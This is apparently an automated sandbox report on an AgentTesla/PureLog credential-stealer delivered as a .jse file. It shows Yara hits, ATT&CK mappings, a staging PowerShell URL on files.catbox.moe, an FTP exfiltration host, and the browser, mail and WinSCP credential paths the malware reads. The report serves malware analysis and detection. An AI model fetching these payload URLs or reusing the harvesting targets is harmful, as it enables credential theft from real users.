              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
              Tries to harvest and steal ftp login credentials
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: x.exeBinary or memory string: WIN_XP
              Source: x.exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
              Source: x.exeBinary or memory string: WIN_XPe
              Source: x.exeBinary or memory string: WIN_VISTA
              Source: x.exeBinary or memory string: WIN_7
              Source: x.exeBinary or memory string: WIN_8
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5212, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Yara detected AgentTesla
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2887524458.0000000003182000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5212, type: MEMORYSTR
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5730000.6.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ed064e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.41a4590.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930ee8.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.5930000.7.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4156458.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.4155570.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 6.2.RegSvcs.exe.2ecf766.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,5_2_004652BE
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,5_2_00476619
              Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 5_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,5_2_0046CEF3

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information21
              Scripting              		2
              Valid Accounts              		221
              Windows Management Instrumentation              		21
              Scripting              		1
              Exploitation for Privilege Escalation              		11
              Disable or Modify Tools              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		2
              Ingress Tool Transfer              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts3
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		11
              Deobfuscate/Decode Files or Information              		121
              Input Capture              		1
              Account Discovery              		Remote Desktop Protocol2
              Data from Local System              		11
              Encrypted Channel              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution              		2
              Valid Accounts              		2
              Valid Accounts              		2
              Obfuscated Files or Information              		1
              Credentials in Registry              		2
              File and Directory Discovery              		SMB/Windows Admin Shares1
              Email Collection              		2
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              Command and Scripting Interpreter              		Login Hook21
              Access Token Manipulation              		2
              Software Packing              		NTDS138
              System Information Discovery              		Distributed Component Object Model121
              Input Capture              		13
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell              		Network Logon Script312
              Process Injection              		1
              DLL Side-Loading              		LSA Secrets751
              Security Software Discovery              		SSH3
              Clipboard Data              		Fallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Masquerading              		Cached Domain Credentials241
              Virtualization/Sandbox Evasion              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
              Valid Accounts              		DCSync3
              Process Discovery              		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job241
              Virtualization/Sandbox Evasion              		Proc Filesystem11
              Application Window Discovery              		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
              Access Token Manipulation              		/etc/passwd and /etc/shadow1
              System Owner/User Discovery              		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron312
              Process Injection              		Network Sniffing1
              System Network Configuration Discovery              		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579018 Sample: doc00290320092.jse Startdate: 20/12/2024 Architecture: WINDOWS Score: 100 31 ip-api.com 2->31 33 ftp.jeepcommerce.rs 2->33 35 files.catbox.moe 2->35 51 Suricata IDS alerts for network traffic 2->51 53 Found malware configuration 2->53 55 Malicious sample detected (through community Yara rule) 2->55 57 11 other signatures 2->57 9 wscript.exe 1 16 2->9         started        signatures3 process4 dnsIp5 41 files.catbox.moe 108.181.20.35, 443, 49707 ASN852CA Canada 9->41 27 C:\Temp\dddddd.ps1, ASCII 9->27 dropped 67 System process connects to network (likely due to code injection or exploit) 9->67 69 Wscript starts Powershell (via cmd or directly) 9->69 71 Windows Scripting host queries suspicious COM object (likely to drop second stage) 9->71 73 Suspicious execution chain found 9->73 14 powershell.exe 13 9->14         started        file6 signatures7 process8 file9 29 C:\Users\user\AppData\Local\Temp\x.exe, PE32 14->29 dropped 75 Found suspicious powershell code related to unpacking or dynamic code loading 14->75 77 Powershell drops PE file 14->77 18 x.exe 2 14->18         started        21 conhost.exe 14->21         started        signatures10 process11 signatures12 43 Antivirus detection for dropped file 18->43 45 Multi AV Scanner detection for dropped file 18->45 47 Machine Learning detection for dropped file 18->47 49 3 other signatures 18->49 23 RegSvcs.exe 15 2 18->23         started        process13 dnsIp14 37 ip-api.com 208.95.112.1, 49708, 80 TUT-ASUS United States 23->37 39 ftp.jeepcommerce.rs 195.252.110.253, 21, 49710 BEOTEL-AShttpwwwbeotelnetRS Serbia 23->39 59 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 23->59 61 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 23->61 63 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 23->63 65 5 other signatures 23->65 signatures15

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              doc00290320092.jse13%ReversingLabs

              Dropped Files

              SourceDetectionScannerLabelLink
              C:\Users\user\AppData\Local\Temp\x.exe100%AviraHEUR/AGEN.1321703
              C:\Users\user\AppData\Local\Temp\x.exe100%Joe Sandbox ML
              C:\Users\user\AppData\Local\Temp\x.exe35%ReversingLabs

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              No Antivirus matches

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              files.catbox.moe
              		108.181.20.35
              		truefalse
                		high
                ftp.jeepcommerce.rs
                		195.252.110.253
                		truefalse
                  		high
                  ip-api.com
                  		208.95.112.1
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://files.catbox.moe/gj7umd.ps1false
                      		high
                      http://ip-api.com/line/?fields=hostingfalse
                        		high

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://files.catbox.moe;wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1772583063.000001B50CC25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://files.catbox.moe/gj7umd.ps1:CreateObjectwscript.exe, 00000001.00000003.1772155185.000001B50AA47000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774713133.000001B50AA64000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773562345.000001B50AA60000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.1741313249.00000244CBFC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://account.dyn.com/RegSvcs.exe, 00000006.00000002.2899470696.0000000005930000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2886300151.0000000002E8F000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2896062999.0000000004151000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2898667090.0000000005730000.00000004.08000000.00040000.00000000.sdmpfalse
                                  		high
                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://contoso.com/powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.1741313249.00000244CBFC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://ip-api.comRegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://contoso.com/Iconpowershell.exe, 00000003.00000002.1712669013.00000244BD62C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                https://oneget.orgXpowershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://ftp.jeepcommerce.rsRegSvcs.exe, 00000006.00000002.2887524458.00000000031AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://files.catbox.moe/wscript.exe, 00000001.00000003.1773587473.000001B50CDED000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://aka.ms/pscore68powershell.exe, 00000003.00000002.1712669013.00000244BB751000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://files.catbox.moewscript.exe, 00000001.00000003.1773041087.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000002.1774814812.000001B50AA80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1772583063.000001B50CC25000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1771488602.000001B50AA7B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.1712669013.00000244BB751000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000006.00000002.2887524458.0000000003151000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.1712669013.00000244BD4B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://files.catbox.moe/gj7umd.ps1uwscript.exe, 00000001.00000003.1627015912.000001B50C95E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000001.00000003.1773818837.000001B50C95E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://oneget.orgpowershell.exe, 00000003.00000002.1712669013.00000244BCEA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high

                                                                  World Map of Contacted IPs

                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs

                                                                  Public IPs

                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  208.95.112.1
                                                                  		ip-api.comUnited States
                                                                  		53334TUT-ASUSfalse
                                                                  108.181.20.35
                                                                  		files.catbox.moeCanada
                                                                  		852ASN852CAfalse
                                                                  195.252.110.253
                                                                  		ftp.jeepcommerce.rsSerbia
                                                                  		6700BEOTEL-AShttpwwwbeotelnetRSfalse

                                                                  General Information

                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1579018
                                                                  Start date and time:2024-12-20 17:40:58 +01:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 28s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:11
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • GSI enabled (Javascript)
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:doc00290320092.jse
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.expl.evad.winJSE@8/8@3/3
                                                                  EGA Information:
                                                                  • Successful, ratio: 66.7%
                                                                  HCA Information:
                                                                  • Successful, ratio: 97%
                                                                  • Number of executed functions: 55
                                                                  • Number of non-executed functions: 297
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .jse

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 172.202.163.200, 13.107.246.63
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Execution Graph export aborted for target powershell.exe, PID 1212 because it is empty
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: doc00290320092.jse

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  11:42:32API Interceptor4x Sleep call for process: powershell.exe modified
                                                                  11:42:38API Interceptor2197540x Sleep call for process: RegSvcs.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  208.95.112.1DHL_231437894819.bat.exeGet hashmaliciousAgentTeslaBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  dlhost.exeGet hashmaliciousXWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  WdlA0C4PkO.exeGet hashmaliciousGo Stealer, Skuld StealerBrowse
                                                                  • ip-api.com/json
                                                                  xt.exeGet hashmaliciousXWormBrowse
                                                                  • ip-api.com/line/?fields=hosting
                                                                  roblox1.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                  • ip-api.com/json
                                                                  roblox.exeGet hashmaliciousPython Stealer, Monster StealerBrowse
                                                                  • ip-api.com/json
                                                                  random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                  • ip-api.com/json
                                                                  x.ps1Get hashmaliciousQuasarBrowse
                                                                  • ip-api.com/json/
                                                                  Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                  • ip-api.com/json/
                                                                  Shipping Bill No6239999Dt09122024.PDF.jarGet hashmaliciousCaesium Obfuscator, STRRATBrowse
                                                                  • ip-api.com/json/

                                                                  Domains

